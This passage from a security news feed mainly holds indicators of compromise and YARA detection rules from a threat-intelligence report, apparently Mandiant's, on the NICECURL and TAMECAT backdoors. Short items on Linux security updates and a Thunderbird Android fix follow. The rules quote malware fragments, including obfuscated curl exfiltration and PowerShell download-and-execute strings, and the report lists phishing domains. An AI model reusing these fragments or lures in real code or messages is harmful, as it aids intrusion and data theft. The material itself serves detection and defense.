<p><span>bq-ledmagic[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>briview[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>chat-services[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>check-online-panel[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>check-pabnel-status[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>check-panel-status[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>check-panel-status[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>check-short-panel[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>confirmation-process[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>connection-view[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>continue-meeting[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>continue-recognized[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>cvisiion[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>drive-access[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>endorsement-services[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>fortune-retire-home[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>geaviews[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>glory-uplift-vouch[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>go-conversation[.]lol</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>go-forward[.]quest</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>gview[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>home-continue[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>home-proceed[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>identifier-direction[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>indication-service[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>join-paneling[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ksview[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>last-check-leave[.]buzz</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>live-project-online[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>live-projects-online[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>loriginal[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mail-roundcube[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>meeting-online[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mterview[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>nterview[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>online-processing[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>online-video-services[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ovcloud[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-check-short[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-check-short[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-live-check[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-short-check[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-view-short[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-view[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-view[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panel-views-cheking[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panelchecking[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>paneling-viewing[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>panels-views-ckeck[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>pannel-get-data[.]us</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>quomodocunquize[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>recognize-validation[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>reconsider[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>revive-project-live[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>short-url[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>short-view[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shortenurl[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shortingurling[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shortlinkview[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shortulonline[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shorting-ce[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>shoting-urls[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>simple-process-static[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>status-short[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>stellar-roar-right[.]buzz</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>sweet-pinnacle-readily[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>tcvision[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>title-flow-store[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>twision[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>ushrt[.]us</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>verify-person-entry[.]top</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>view-cope-flow[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>view-panel[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>view-pool-cope[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>view-total-step[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>viewstand[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>viewtop[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>virtue-regular-ready[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>we-transfer[.]shop</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>URL Shortening Services</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>m85[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>s51[.]online</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>s59[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>s20[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>d75[.]site</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Cluster C</strong></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>URL Shortening Services</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>bitly[.]org[.]il</span></p>
</td>
<td>
<p><span>Bitly</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
</tr>
<tr>
<td>
<p><span>litby[.]us</span></p>
</td>
<td>
<p><span>Bitly</span></p>
</td>
<td>
<p><span>U.S.</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Mailer Daemon</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>daemon-mailer[.]co</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>daemon-mailer[.]info</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>email-daemon[.]biz</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>email-daemon[.]biz[.]tinurls[.]com</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>email-daemon[.]online[.]tinurls[.]com</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>email-daemon[.]online</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>email-daemon[.]site</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mailer-daemon[.]info</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mailerdaemon[.]online</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mailer-daemon[.]us</span></p>
</td>
<td>
<p><span>Mailer Daemon</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Think Tanks &amp; Research Institutes</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>aspenlnstitute[.]org</span></p>
</td>
<td>
<p><span>Aspen Institute</span></p>
</td>
<td>
<p><span>U.S.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>mccainlnstitute[.]org</span></p>
</td>
<td>
<p><span>Mccain Institute</span></p>
</td>
<td>
<p><span>U.S.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>washingtonlnstitute[.]org</span></p>
</td>
<td>
<p><span>The Washington Institute</span></p>
</td>
<td>
<p><span>U.S.</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>File Sharing Services</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>youtransfer[.]live</span></p>
</td>
<td>
<p><span>YouTransfer</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td colspan="3">
<p><strong>Miscellaneous </strong></p>
</td>
</tr>
<tr>
<td>
<p><span>g-online[.]org</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>online-access[.]live</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>youronlineregister[.]com</span></p>
</td>
<td>
<p><span>Generic</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<h3><span>Malware Operations</span></h3>
<h4><span>NICECURL</span></h4>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Related IOCs</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>d5a05212f5931d50bb024567a2873642</span></p>
</td>
</tr>
<tr>
<td>
<p><span>347b273df245f5e1fcbef32f5b836f1d</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2f6bf8586ed0a87ef3d156124de32757</span></p>
</td>
</tr>
<tr>
<td>
<p><span>13aa118181ac6a202f0a64c0c7a61ce7</span></p>
</td>
</tr>
<tr>
<td>
<p><span>c23663ebdfbc340457201dbec7469386</span></p>
</td>
</tr>
<tr>
<td>
<p><span>853687659483d215309941dae391a68f</span></p>
</td>
</tr>
<tr>
<td>
<p><span>drive-file-share[.]site</span></p>
</td>
</tr>
<tr>
<td>
<p><span>prism-west-candy[.]glitch[.]me</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>NICECURL: YARA Rules</span></h4>
<pre class="language-plain"><code>rule M_APT_Backdoor_NICECURL_1 {
	meta:
		author = "Mandiant"
		md5 = "c23663ebdfbc340457201dbec7469386"
		date_created = "2024-01-18"
	    date_modified = "2024-01-18"
	    rev = "1"
	strings:
		$ = "a = \"llehS.tpircsW\"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)"
		$ = "WHFilePath = Temp &amp; \"/\" &amp; ProgName" ascii wide
		$ = "Do While not FileExists(WHFilePath)" ascii wide
		$ = "cmd /C start /MIN curl --ssl-no-revoke -s -d \"\"\"" ascii wide
		$ = "nicecmdPath = Temp &amp; \"/\" &amp; ProgName" ascii wide
		$ = "Function RunCom(Com, Url, nicecmdPath)" ascii wide
		$ = "ComDecode = Base64Decode(Com)" ascii wide
		$ = "InStr(ComDecode, \"kill\")" ascii wide
		$ = "InStr(ComDecode, \"SetNewConfig\")" ascii wide
		$ = "InStr(ComDecode, \"Module\")" ascii wide
		$ = "Sub DeleteFile(filespec)" ascii wide
		$ = "Sub CopyFile(Src, Dst)" ascii wide
		$ = "Function SendData(sUrl, sRequest, nicecmdPath)" ascii wide
		$ = "Function WriteToFile(FilePath, data)" ascii wide
		$ = "Function GetSystemCaption()" ascii wide
		$ = "Function GetPlainSess()" ascii wide
	condition:
	4 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_NICECURL_datamine_module_1 {
	meta:
		author = "Mandiant"
		md5 = "853687659483d215309941dae391a68f"
		date_created = "2024-01-18"
	    date_modified = "2024-01-18"
	    rev = "1"
	strings:
		$ = "a = \"llehS.tpircsW\"" ascii wide
		$ = "b = StrReverse(a)" ascii wide
		$ = "Set objShell = wscript.CreateObject(b)" ascii wide
		$ = "ModuleName &amp; \" module started successfully.\"" ascii wide
		$ = "SendLog(MAC, Logs, ModuleName, \"Success\")" ascii wide
		$ = "&amp; vbNewLine  &amp; \"*** Ant:\"" ascii wide
		$ = "For Each antivirus in installedAntiviruses" ascii wide
		$ = "list=list &amp; VBNewLine &amp; antivirus.displayName" ascii wide
		$ = "checking the state of the 12th bit of productState property of 
the antivirus" ascii wide
		$ = "For Each item In query_result" ascii wide
		$ = "Set query_result = objWMI.ExecQuery(\"" ascii wide
		$ = "Function SendFile(FilePath, ModuleName)" ascii wide
		$ = "Function SendData(Base64Data, FolderName, FileName, Format)" 
ascii wide
		$ = "call HTTPPost(Url, sRequest)" ascii wide
		$ = "ChunckData = Mid(Base64Data, 1, lengthdata)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1)" ascii wide
		$ = "ChunckData = Mid(Base64Data, (i * lengthdata) + 1, lengthdata)" 
ascii wide
		$ = "Function SendLog(MAC, Logs, ModuleName, Status)" ascii wide
	condition:
	4 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>TAMECAT</span></h4>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Related IOCs</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>d7bf138d1aa2b70d6204a2f3c3bc72a7</span></p>
</td>
</tr>
<tr>
<td>
<p><span>081419a484bbf99f278ce636d445b9d8</span></p>
</td>
</tr>
<tr>
<td>
<p><span>c3b9191f3a3c139ae886c0840709865e</span></p>
</td>
</tr>
<tr>
<td>
<p><span>dd2653a2543fa44eaeeff3ca82fe3513</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c5337e0b1aef2657948fd5e82bdb4c3</span></p>
</td>
</tr>
<tr>
<td>
<p><span>tnt200[.]mywire[.]org</span></p>
</td>
</tr>
<tr>
<td>
<p><span>accurate-sprout-porpoise[.]glitch[.]me</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<h4><span>TAMECAT: YARA Rules</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_TAMECAT_2 {
	meta:
		author = "Mandiant"
		md5 = "9c5337e0b1aef2657948fd5e82bdb4c3"
		date_created = "2024-03-05"
	    date_modified = "2024-03-05"
	    rev = "1"
	strings:
		$ = "$a.CreateDecryptor($a.Key,$a.iv)"
		$ = "$CommandParts = \"\""
		$ = "$macP = $env:APPDATA+\"\\"
		$ = "$macP = \"$env:LOCALAPPDATA\\"
		$ = "$mac += Get-Content -Path $macP"
		$ = "$CommandParts =$SessionResponse.Split(\""
		$ = "[string]$CommandPart = \"\";"
		$ = "Foreach ($CommandPart in $CommandParts)"
		$ = "$CommandPart.Split(\"~\");"
		$ = "elseif($StartStop -eq \"stop\")"
		$ = "if($StartStop -eq \"start\")"
		$ = "&amp;(gcm *ke-e*) $Command;"
	condition:
		3 of them and filesize&lt;2MB
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_TAMECAT_NICECURL_VBScript_1 {
    meta:
        author = "Mandiant"
        md5 = "d7bf138d1aa2b70d6204a2f3c3bc72a7"
        date_created = "2024-03-13"
        date_modified = "2024-03-13"
        rev = "1"
    strings:
        $ = "For Each antivirus in installedAntiviruses"
        $ = "list=list &amp; VBNewLine &amp; antivirus.displayName"
        $ = "\"conhost conhost powershell.exe -w 1 -c \""
        $ = "-UseBasicParsing).Content; &amp;(gcm *e-e?p*)$"
        $ = "Set oE = objShell.Exec("
        $ = "\"cmd.exe /c set c=cu9rl --s9sl-no-rev9oke -s -d \""
        $ = "&amp; call %c:9=% &amp; set b=sta9rt"
    condition:
    3 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_TAMECAT {
    meta:
        author = "Mandiant"
        md5 = "d7bf138d1aa2b70d6204a2f3c3bc72a7"
        date_created = "2024-03-11"
        date_modified = "2024-03-11"
        rev = "1"
  strings:
    $s1 = "OutputCom = OutputCom &amp; \"NOT_FOUND\"" ascii wide
    $s2 = "OutputCom = OutputCom &amp; list" ascii wide
    $s3 = "If  antivirus.productState And &amp;h01000 Then" ascii wide
  condition:
    all of them
}</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel), Debian (dovecot, exim4, frr, and haveged), Fedora (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl,...]]></description>
<link>https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 05 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel), <b>Debian</b> (dovecot, exim4, frr, and haveged), <b>Fedora</b> (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl, python-starlette, rubygem-yard, rust-sequoia-cert-store, rust-sequoia-chameleon-gnupg, rust-sequoia-octopus-librnp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-wot, samba, and transmission), <b>Red Hat</b> (image-builder), <b>Slackware</b> (dnsmasq and libinput), <b>SUSE</b> (evince, glibc, google-guest-agent, hplip, ignition, LibVNCServer, libzypp, libsolv, python-Pillow, salt, thunderbird, and vim), and <b>Ubuntu</b> (apache2, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-5.15, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15,
 linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg,
 linux-kvm, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15,
 linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-azure, linux-azure-5.4,
 linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4,
 linux-gcp-fips, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4,
 linux-xilinx-zynqmp, linux, linux-azure, linux-azure-4.15, linux-azure-fips, linux-fips,
 linux-gcp-4.15, linux-gcp-fips, linux-kvm, linux-oracle, linux-aws-5.4, linux-hwe-5.4, linux-azure-fips, linux-fips, linux-raspi, linux-raspi-5.4, nano, postfix, robocode, tomcat6, tomcat7, and yard).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 19.2 für Android: Update behebt Absturz beim QR-Scan]]></title>
<description><![CDATA[Das Team hinter dem mobilen Thunderbird hat ein kleines, Update auf Version 19.2 veröffentlicht. Die Entwickler haben hierbei einen spezifischen Fehler korrigiert. Bisher stürzte die App, die auf K-9 Mail basiert, unter bestimmten Umständen reproduzierbar ab, wenn Nutzer versuchten, einen...Zum B...]]></description>
<link>https://tsecurity.de/de/3574727/it-nachrichten/thunderbird-192-fuer-android-update-behebt-absturz-beim-qr-scan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574727/it-nachrichten/thunderbird-192-fuer-android-update-behebt-absturz-beim-qr-scan/</guid>
<pubDate>Fri, 05 Jun 2026 10:02:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Team hinter dem mobilen Thunderbird hat ein kleines, Update auf Version 19.2 veröffentlicht. Die Entwickler haben hierbei einen spezifischen Fehler korrigiert. Bisher stürzte die App, die auf K-9 Mail basiert, unter bestimmten Umständen reproduzierbar ab, wenn Nutzer versuchten, einen...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/thunderbird-19-2-fuer-android-update-behebt-absturz-beim-qr-scan/">Thunderbird 19.2 für Android: Update behebt Absturz beim QR-Scan</a>
</p><p>
Wo du uns folgen kannst:
